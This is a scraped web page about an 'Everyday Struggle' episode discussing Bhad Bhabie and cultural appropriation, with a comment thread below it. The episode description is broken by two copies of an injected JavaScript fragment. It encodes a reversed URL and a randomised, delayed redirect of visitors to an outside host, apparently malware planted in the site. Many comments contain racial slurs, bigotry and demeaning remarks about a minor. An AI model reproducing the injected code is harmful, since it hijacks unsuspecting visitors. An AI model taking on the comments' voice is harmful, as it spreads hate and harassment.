Bhad Bhabie Says She Isn’t Appropriating Black Culture | Everyday Struggle

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On toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}today’s #EverydayStruggle, DJ Whoo Kid joined DJ Akademiks and Nadeska toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to break down Bhad Bhabie’s comments where she said she isn’t taking advantage of black culture.

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26 thoughts on “Bhad Bhabie Says She Isn’t Appropriating Black Culture | Everyday Struggle”

  1. Josh Guillaume says:

    Why she said ridiculous so much

  2. [B-Zilla] says:

    "Everyday Struggle is unfair
    Complex is in there
    Standin' at the concession
    Plottin' Joe's oppression"

  3. Carlos Trevino says:

    Nnnnnnnnnnnnnn new Joe Budden!!

  4. KENYAN ONLINE says:

    That's ridiculous . How can you act a color? Lame commentators

  5. Odd says:

    He's trying to be joe so hard lol

  6. el kay says:

    this shit is garbage, bring back joe

  7. Raymundo Hernandez says:

    Black people are hypocrites

  8. sambo198921 says:

    No Joe No Show

  9. SEBp Mtl says:

    a lot of people you call white probably have african ancestry. who knows. Unless you do a dna test. That whole cultural appropriation thing makes me laugh. You don't act a certain color. Maybe a certain culture (ratchet, or urban like she said). Culture is organic. People get influenced subconsciously, they live around certain types of people and/or try to fit in a certain group and they mimic what's around them. That's not stealing. It's evolution. It's like people that say that rock musicians ripped off black musicians. If it's the case then, jazz musicians stole from classical composers. I don't believe that but I'm just making a point about how useless and unproductive these types of discussions are. Bring Joe back and in the meantime, I'll go listen to Rude Jude instead…..Culture appropriation is an expression uncreative people use.

  10. Holly Mcninch says:

    Oh my god you do not talk about bhad bhaibe

  11. ll-RifleGod-e3o Gaming says:

    u cant act a color just call it you these niggaz deserve to take they youtube channel down i only dj thats it i dont like that lightskin bitch and i dont like joe budden or that niggaz idk he is noticeable cause he will stay noticeable yall niggaz are childish you getting mad at a 14 year old girl yall childish asf if yall was talkin bout me boi i wouldve said you getting mad at 15 yr old who made and came from nothing and yall dissing lil kids thats some childish shit right there get da fuck out of youtube yall 2 hating motherfucka

  12. SiM Gonzales says:

    2:50 Look at the left of Ak, they forgot to take off the Joe Budden posters LMFAO

  13. DVNGELO Morales says:

    All 3 of ya niggas are ridiculous. You cant act a color and thats facts. Ya want her to say shes acting “black” but NOT ALL BLACK PPL ACT LIKE THAT OR WOULD WANNA ACT LIKE THAT. Stfu with the “acting black” If im making money and the manager of a big ass job am I acting white ? or if im hittin liqs and runnin up on niggas with the the Drayco am i black ?

  14. Moon Man Jan says:

    Last episode?

  15. DVNGELO Morales says:

    Get this Goober Head ass Whookid df outta here. #NoJoeNoShow and why are 3 adults washin on a youngin lol

    and nigga whookid type iffy for bringing up how shorty isnt a stripper. especially since shes a minor.

  16. Adolfo Cortes says:

    If joe was here he wouldn’t even bother to talk about this pointless topic. Stop giving stupid people attention

  17. cup says:

    This is racist itself. Acting hood and like a degenerate thug is not black culture.

  18. SeparationIsTheOnlySolution ! ! says:

    Bm This little thot is trying to be down so bad. Culture vulture at it's finest ! Only boot licking Coons and pink pig skin Wiggers think this shit is normal.

  19. Franky Spawn says:

    She is just a funny lil kid. so pls.

  20. CNCOwner agb says:

    they’re trying to prove a point that white bitches these days are cultural appropriating I’m sure they didn’t mean ALL black people are ratchet but they’re right Danielle is trying to act like a ghetto black girl persona. It’s a thing and I’m not saying all black girls are like that but it’s true that she’s tryna act as though that’s her personality

  21. Ana Rosales says:

    Y’all some grown ass men talking down on a 15 year old girl smh fuck outta hea

  22. Ana Rosales says:

    So y’all pretty much saying all black ppl ratchet ? Lol . Y’all talking down on ya own race LMFAO

  23. Brandy Wood says:

    Nigga stop lying you and I both know that shit was wack.

  24. Jesse Carson says:

    Yall need to curb ur racism and hate shes better than %95 of them out now..and people kill me they hate so bad they act like they cant say her nameto, but they always say bhad the right way…and yall get so pissed when black people get "stereotyped" but you were stereotyping yourselves many times in this vid..example the lip thing..foh

  25. Jesse Carson says:

    Ak you know you rock with her shit acting like you never heard her flow yall are lowkey mad af at this girl lmao

  26. Jesse Carson says:

    Nadeska a mad hater bitch you know she hot

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